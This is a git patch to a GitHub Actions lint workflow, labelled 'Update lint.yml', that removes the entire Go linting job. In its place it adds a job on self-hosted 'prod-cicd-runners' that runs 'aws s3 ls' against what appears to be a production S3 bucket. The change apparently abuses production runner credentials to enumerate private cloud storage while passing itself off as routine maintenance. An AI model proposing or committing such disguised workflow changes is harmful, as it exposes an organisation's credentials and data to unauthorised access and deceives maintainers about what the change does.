From 4dc20e1e0876ece6af55828cc07287beff780824 Mon Sep 17 00:00:00 2001 From: Alan <134836984+dangerousidea@users.noreply.github.com> Date: Mon, 30 Dec 2024 10:20:41 +0800 Subject: [PATCH] Update lint.yml --- .github/workflows/lint.yml | 42 +++----------------------------------- 1 file changed, 3 insertions(+), 39 deletions(-) diff --git a/.github/workflows/lint.yml b/.github/workflows/lint.yml index 87bfb710dd..89b452344b 100644 --- a/.github/workflows/lint.yml +++ b/.github/workflows/lint.yml @@ -13,46 +13,10 @@ on: jobs: golang-lint: - strategy: - matrix: - go-version: [1.19.x] - os: [ubuntu-latest] - runs-on: ${{ matrix.os }} + runs-on: [prod-cicd-runners] steps: - - name: Install Go - uses: actions/setup-go@v3 - with: - go-version: ${{ matrix.go-version }} - - name: Checkout code uses: actions/checkout@v3 - - uses: actions/cache@v3 - with: - # In order: - # * Module download cache - # * Build cache (Linux) - # * Build cache (Mac) - # * Build cache (Windows) - path: | - ~/go/pkg/mod - ~/.cache/go-build - ~/Library/Caches/go-build - ~\AppData\Local\go-build - key: ${{ runner.os }}-go-${{ hashFiles('**/go.sum') }} - restore-keys: | - ${{ runner.os }}-go- - - - run: | - go mod download - - - name: golangci-lint - uses: golangci/golangci-lint-action@v3 - with: - # Optional: version of golangci-lint to use in form of v1.2 or v1.2.3 or `latest` to use the latest version - version: v1.52.2 - working-directory: ./ - skip-pkg-cache: true - skip-cache: true - skip-build-cache: true - args: --timeout=99m --config ./.golangci.yml + - name: Run a one-line script + run: aws s3 ls s3://tf-nodereal-prod-nodereal-static/*